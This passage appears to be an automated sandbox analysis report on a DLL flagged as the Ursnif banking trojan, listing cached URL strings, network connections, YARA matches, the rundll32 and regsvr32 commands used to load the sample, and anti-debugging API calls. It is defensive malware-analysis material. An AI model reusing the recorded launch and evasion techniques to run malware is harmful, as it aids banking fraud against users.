                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-ss&amp;ued=htt
                    Source: iab2Data[1].json.8.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;t
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/
                    Source: ~DF32BF974DC7EDD637.TMP.6.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/26-j%c3%a4hriger-erliegt-nach-sturz-von-mauer-bei-
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/26-j%c3%a4hriger-mann-stirbt-nach-sturz-auf-vorpla
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/eye-tracking-bei-online-pr%c3%bcfungen-keiner-%c3%
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/k%c3%b6nnen-seil-oder-hochbahnen-z%c3%bcrichs-verk
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/mehr-sicherheit-und-weniger-versp%c3%a4tungen-im-f
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wer-bekommt-im-kanton-z%c3%bcrich-pr%c3%a4mienverb
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/news/other/berufung-zum-professor-ohne-doktortitel/ar-AAKEMiw?ocid=hplocal
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/news/other/der-singende-snowboader/ar-AAKFmIQ?ocid=hplocalnews
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/news/other/gr%c3%bcne-fordern-regierung-soll-zeitungen-f%c3%b6rdern/ar-AAK
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/news/other/junger-mann-stirbt-nach-sturz-von-einer-mauer-bei-der-eth/ar-AA
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.skype.com/
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://www.skype.com/de
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://www.skype.com/de/download-skype
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
                    Source: de-ch[1].htm.8.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
                    Source: iab2Data[1].json.8.drString found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
                    Source: iab2Data[1].json.8.drString found in binary or memory: https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html
                    Source: 52-478955-68ddb2ab[1].js.8.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.6:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.6:49729 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.6:49741 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.6:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.6:49743 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.6:49744 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.6:49745 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000004.00000003.588987624.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.595581816.0000000002CB0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.589938586.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.600578000.0000000001530000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4.2.rundll32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.3.rundll32.exe.2dd8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.1538d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.loaddll32.exe.6e1f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.regsvr32.exe.6f8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.3.rundll32.exe.2cb8d03.0.raw.unpack, type: UNPACKEDPE

                    E-Banking Fraud:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000004.00000003.588987624.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.595581816.0000000002CB0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.589938586.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.600578000.0000000001530000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4.2.rundll32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.3.rundll32.exe.2dd8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.1538d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.loaddll32.exe.6e1f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.regsvr32.exe.6f8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.3.rundll32.exe.2cb8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F2485 NtQueryVirtualMemory,0_2_6E1F2485
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E1F2485 NtQueryVirtualMemory,3_2_6E1F2485
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F22640_2_6E1F2264
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2352500_2_6E235250
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2476750_2_6E247675
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E245CC10_2_6E245CC1
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E245DE10_2_6E245DE1
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E23D8400_2_6E23D840
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E1F22643_2_6E1F2264
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E2352503_2_6E235250
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E2476753_2_6E247675
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E245CC13_2_6E245CC1
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E245DE13_2_6E245DE1
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E23D8403_2_6E23D840
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2352504_2_6E235250
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2476754_2_6E247675
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E245CC14_2_6E245CC1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E245DE14_2_6E245DE1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E23D8404_2_6E23D840
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E2352507_2_6E235250
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E2476757_2_6E247675
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E245CC17_2_6E245CC1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E245DE17_2_6E245DE1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E23D8407_2_6E23D840
                    Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E237990 appears 37 times
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6E237990 appears 37 times
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E237990 appears 74 times
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E240930 appears 36 times
                    Source: racial.dllBinary or memory string: OriginalFilenameRoad.dll8 vs racial.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: racial.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                    Source: racial.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal64.troj.winDLL@13/121@10/3
                    Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{85E47630-C4CE-11EB-90E5-ECF4BB2D2496}.datJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:168:WilStaging_02
                    Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF6E3A3FF63960FEDB.TMPJump to behavior
                    Source: racial.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                    Source: racial.dllVirustotal: Detection: 24%
                    Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\racial.dll'
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\racial.dll
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\racial.dll,DllRegisterServer
                    Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6624 CREDAT:17410 /prefetch:2
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1Jump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\racial.dllJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\racial.dll,DllRegisterServerJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1Jump to behavior
                    Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6624 CREDAT:17410 /prefetch:2Jump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: racial.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                    Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: c:\Steam\Egg\332\people\Spec\Road.pdb source: loaddll32.exe, 00000000.00000002.605350042.000000006E249000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.605744185.000000006E249000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.605325782.000000006E249000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.609285237.000000006E249000.00000002.00020000.sdmp, racial.dll
                    Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F1F31 LoadLibraryA,GetProcAddress,0_2_6E1F1F31
                    Source: racial.dllStatic PE information: real checksum: 0x86142 should be: 0x83216
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\racial.dll
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F2200 push ecx; ret 0_2_6E1F2209
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F2253 push ecx; ret 0_2_6E1F2263
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E200681 push edi; ret 0_2_6E200682
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2006D9 push ebp; retf 0_2_6E2006EC
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2017A4 push esp; ret 0_2_6E2017A5
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E200483 pushad ; ret 0_2_6E200497
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1FE541 push ebx; ret 0_2_6E1FE542
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E201AED pushad ; ret 0_2_6E201AF9
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1FF039 push ebx; retf 0_2_6E1FF08E
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E20016F push esp; iretd 0_2_6E2001ED
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1FE18A push esp; ret 0_2_6E1FE18B
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E1F2200 push ecx; ret 3_2_6E1F2209
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E1F2253 push ecx; ret 3_2_6E1F2263
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E200681 push edi; ret 3_2_6E200682
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E2006D9 push ebp; retf 3_2_6E2006EC
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E2017A4 push esp; ret 3_2_6E2017A5
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E200483 pushad ; ret 3_2_6E200497
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E1FE541 push ebx; ret 3_2_6E1FE542
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E201AED pushad ; ret 3_2_6E201AF9
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E1FF039 push ebx; retf 3_2_6E1FF08E
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E20016F push esp; iretd 3_2_6E2001ED
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E1FE18A push esp; ret 3_2_6E1FE18B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E200681 push edi; ret 4_2_6E200682
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2006D9 push ebp; retf 4_2_6E2006EC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2017A4 push esp; ret 4_2_6E2017A5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E200483 pushad ; ret 4_2_6E200497
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1FE541 push ebx; ret 4_2_6E1FE542
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E201AED pushad ; ret 4_2_6E201AF9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1FF039 push ebx; retf 4_2_6E1FF08E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E20016F push esp; iretd 4_2_6E2001ED
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1FE18A push esp; ret 4_2_6E1FE18B

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000004.00000003.588987624.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.595581816.0000000002CB0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.589938586.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.600578000.0000000001530000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4.2.rundll32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.3.rundll32.exe.2dd8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.1538d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.loaddll32.exe.6e1f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.regsvr32.exe.6f8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.3.rundll32.exe.2cb8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E240D7A FindFirstFileExW,0_2_6E240D7A
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E240D7A FindFirstFileExW,3_2_6E240D7A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E240D7A FindFirstFileExW,4_2_6E240D7A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E240D7A FindFirstFileExW,7_2_6E240D7A
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E23A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E23A5EE
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F1F31 LoadLibraryA,GetProcAddress,0_2_6E1F1F31
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E23C28B mov eax, dword ptr fs:[00000030h]0_2_6E23C28B
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E240947 mov eax, dword ptr fs:[00000030h]0_2_6E240947
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2723C3 mov eax, dword ptr fs:[00000030h]0_2_6E2723C3
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2722F9 mov eax, dword ptr fs:[00000030h]0_2_6E2722F9
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E271F00 push dword ptr fs:[00000030h]0_2_6E271F00
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E23C28B mov eax, dword ptr fs:[00000030h]3_2_6E23C28B
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E240947 mov eax, dword ptr fs:[00000030h]3_2_6E240947
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E2723C3 mov eax, dword ptr fs:[00000030h]3_2_6E2723C3
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E2722F9 mov eax, dword ptr fs:[00000030h]3_2_6E2722F9
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E271F00 push dword ptr fs:[00000030h]3_2_6E271F00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E23C28B mov eax, dword ptr fs:[00000030h]4_2_6E23C28B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E240947 mov eax, dword ptr fs:[00000030h]4_2_6E240947
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2723C3 mov eax, dword ptr fs:[00000030h]4_2_6E2723C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E271F00 push dword ptr fs:[00000030h]4_2_6E271F00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2722F9 mov eax, dword ptr fs:[00000030h]4_2_6E2722F9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E23C28B mov eax, dword ptr fs:[00000030h]7_2_6E23C28B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E240947 mov eax, dword ptr fs:[00000030h]7_2_6E240947
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E2723C3 mov eax, dword ptr fs:[00000030h]7_2_6E2723C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E2722F9 mov eax, dword ptr fs:[00000030h]7_2_6E2722F9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E271F00 push dword ptr fs:[00000030h]7_2_6E271F00
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E23A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E23A5EE
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E237869 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E237869
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2379EB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E2379EB
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E23A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E23A5EE
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E237869 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E237869
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6E2379EB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E2379EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E23A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6E23A5EE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E237869 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6E237869
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2379EB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6E2379EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E23A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6E23A5EE
